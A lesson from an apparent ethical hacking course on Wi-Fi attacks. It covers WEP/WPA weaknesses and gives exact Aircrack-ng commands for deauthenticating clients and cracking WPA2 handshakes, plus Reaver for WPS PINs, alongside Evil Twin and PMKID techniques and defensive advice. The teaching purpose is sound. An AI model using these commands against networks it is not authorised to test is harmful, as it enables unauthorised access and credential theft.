Ethical Hacking Wireless Network Hacking

Wireless networks broadcast data through the air. Unlike wired networks where an attacker needs physical access to a cable or switch port, Wi-Fi signals extend beyond walls, floors, and building boundaries. Anyone within radio range can attempt to intercept or join the network. Wireless security testing is a core component of many penetration tests because organizations frequently overlook the risks of their Wi-Fi infrastructure.

How Wi-Fi Works

A wireless access point (AP) broadcasts a network name called the SSID (Service Set Identifier). Devices within range discover the AP and initiate a connection. The AP authenticates the device — typically by verifying a password — and assigns it an IP address. All traffic then flows wirelessly between the device and the AP, which connects to the wired network.

Because all this communication travels through open radio waves, anyone within range with a wireless adapter in monitor mode can capture the raw packets.

Wireless Security Protocols

ProtocolYearStatusKey Weakness
WEP1997Completely brokenRC4 implementation flaws; crackable in minutes
WPA2003Deprecated — weakTKIP protocol has known vulnerabilities
WPA2-Personal2004Vulnerable to offline brute force4-way handshake can be captured and cracked offline
WPA2-Enterprise2004Secure when configured correctlyRADIUS server misconfiguration risks
WPA32018Current standardDragonblood vulnerabilities in early implementations (mostly patched)

Required Hardware for Wireless Testing

The built-in Wi-Fi adapters in most laptops cannot be placed in monitor mode — a requirement for capturing wireless packets. Ethical hackers use dedicated USB wireless adapters with chipsets that support monitor mode and packet injection.

Popular chipsets for wireless testing include:

  • Alfa AWUS036ACH — The standard choice; long range, supports 2.4 GHz and 5 GHz, monitor mode and injection supported
  • TP-Link TL-WN722N v1 — Budget option; only v1 (Atheros chipset) supports monitor mode; later versions use a different chipset

The Aircrack-ng Suite

Aircrack-ng is the standard toolkit for wireless network testing in Kali Linux. It includes several specialized tools:

  • airmon-ng — Puts the wireless adapter into monitor mode
  • airodump-ng — Captures wireless packets and shows nearby networks
  • aireplay-ng — Injects packets — used to deauthenticate clients and capture handshakes
  • aircrack-ng — Cracks WEP keys and WPA/WPA2 handshakes using a wordlist

Cracking WPA2-Personal: The 4-Way Handshake Attack

WPA2-Personal protects a network with a Pre-Shared Key (PSK) — the Wi-Fi password. When a device connects, it performs a 4-way handshake with the AP. This handshake does not transmit the password directly. Instead, both sides prove they know the password by computing a value derived from it.

An ethical hacker captures this handshake by listening passively or by sending a deauthentication frame to force a connected device to reconnect. The captured handshake is then taken offline and tested against a wordlist — the same process as cracking a password hash.

Step-by-Step WPA2 Handshake Capture

  1. Put the adapter in monitor mode: airmon-ng start wlan0
  2. Scan for networks: airodump-ng wlan0mon
  3. Target a specific network and capture traffic: airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
  4. Force a reconnection (deauth attack): aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
  5. Wait for the WPA handshake to appear in airodump-ng output.
  6. Crack the handshake: aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt

If the Wi-Fi password appears in rockyou.txt or any other wordlist, aircrack-ng recovers it. A strong, unique Wi-Fi password that does not appear in any wordlist survives this attack.

PMKID Attack

The PMKID attack is a newer method that does not require capturing the full 4-way handshake. The PMKID (Pairwise Master Key Identifier) is a value broadcast by the access point in the first EAPOL frame of the connection process. It can be captured without waiting for a client to connect or reconnect. The PMKID is derived from the network password, allowing offline cracking using the same wordlist approach as the handshake attack.

Tool: hcxdumptool + hcxtools + Hashcat

Evil Twin Attack

An Evil Twin creates a rogue access point with the same SSID as a legitimate network. The attacker sets up the fake AP with a stronger signal than the real one. Devices automatically connect to the strongest signal — they join the attacker's AP instead of the real one.

Once devices connect to the Evil Twin, the attacker can:

  • Capture all unencrypted traffic passing through the fake AP
  • Serve a fake captive portal asking victims to "re-authenticate" to capture credentials
  • Perform a man-in-the-middle attack on HTTPS connections using SSL stripping or a fake certificate

Tool: hostapd-wpe for WPA2-Enterprise Evil Twins; airbase-ng for basic rogue APs.

WPS Attacks

WPS (Wi-Fi Protected Setup) was designed to simplify connecting devices using an 8-digit PIN instead of a password. The implementation has a critical flaw: the PIN is verified in two separate 4-digit halves. Instead of testing all 100 million combinations of an 8-digit PIN, an attacker only tests 10,000 combinations for the first half and 1,000 for the second — approximately 11,000 total attempts. Most routers with WPS enabled can be cracked in hours.

Tool: Reaver or Bully

reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -v

Recommendation: Disable WPS on all access points. It provides minimal convenience benefit at significant security cost.

Rogue Access Point Detection

Ethical hackers also test an organization's ability to detect rogue access points set up by employees or attackers. A rogue AP connected to the internal network bypasses perimeter security entirely — anyone who connects to the rogue AP has direct access to the internal network.

Wireless intrusion prevention systems (WIPS) detect unauthorized access points by monitoring the RF environment for unknown SSIDs and AP MAC addresses.

Wireless Testing Diagram: Signal Reach Risk

Imagine a fortress with high walls (the firewall). All the gates are locked and guarded. But the Wi-Fi signal passes through the walls. From the parking lot outside, an attacker can:

  • Capture handshakes without entering the building
  • Crack the password and join the network from outside
  • Set up an Evil Twin that employees connect to from the lobby or conference rooms
  • Access every internal resource as if they were a legitimate employee — all while sitting in a car outside

Wireless security testing ensures the walls of the fortress extend to the edges of the radio signal — not just the edges of the building.

Key Points

  • WEP is completely broken; WPA is deprecated; WPA2-Personal is vulnerable to offline dictionary attacks against the 4-way handshake.
  • Monitor mode and packet injection require a compatible USB wireless adapter — built-in laptop adapters typically do not support these modes.
  • The Aircrack-ng suite covers the full WPA2 attack workflow: monitor mode, capture, deauthentication, and offline cracking.
  • The PMKID attack captures crackable material without waiting for a client to connect.
  • Evil Twin attacks create rogue access points that intercept device connections.
  • WPS should be disabled on all access points due to its PIN verification design flaw.
Previous lessons
Back to courses
Next lessons

Leave a Comment